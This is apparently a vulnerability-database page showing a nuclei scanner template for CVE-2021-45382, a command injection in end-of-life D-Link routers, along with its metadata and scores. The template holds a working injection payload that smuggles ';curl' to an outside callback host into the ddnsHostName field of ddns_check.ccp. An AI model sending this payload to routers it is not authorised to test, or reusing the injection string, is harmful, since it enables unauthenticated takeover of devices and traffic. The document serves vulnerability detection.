Lucene search
K

D-Link - Remote Command Execution

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 130 Views

A Remote Command Execution (RCE) vulnerability in D-Link routers allows attackers to execute commands via the DDNS function

Related
Refs
Code
id: CVE-2021-45382

info:
  name: D-Link - Remote Command Execution
  author: king-alexander
  severity: critical
  description: |
    A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file
  impact: |
    Unauthenticated attackers can execute arbitrary system commands via command injection in the DDNS function, leading to complete router compromise and control over network traffic.
  remediation: |
    DIR-810L, DIR-820L, DIR-830L, DIR-826L, DIR-836L, all hardware revisions, have reached their End of Life ("EOL") /End of Service Life ("EOS") Life-Cycle and as such this issue will not be patched.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45382
    - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10264
    - https://github.com/doudoudedi/D-LINK_Command_Injection1/blob/main/D-LINK_Command_injection.md#poc
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/Ostorlab/KEV
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-45382
    cwe-id: CWE-78
    epss-score: 0.97836
    epss-percentile: 0.99899
    cpe: cpe:2.3:o:dlink:dir-820l_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dlink
    product: dir-820l_firmware
  tags: cve2021,cve,dlink,kev,rce,vkev,vuln
variables:
  string1: "{{to_lower(rand_base(5))}}"
  string2: "{{to_lower(rand_base(6))}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/ddns_check.ccp"

    body: "ccp_act=doCheck&ddnsHostName=;curl https://{{interactsh-url}};&ddnsUsername={{string1}}&ddnsPassword={{string2}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4b0a00483046022100c83711ab7c75106cedcd340dff27b06242693d2b25f1cf6275e43df91a4b405f0221008e222fef9ad1293002f0f5fb7916428177e509be53c0e553b441343240ce2527:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
CVSS 210
EPSS0.97836
SSVC
130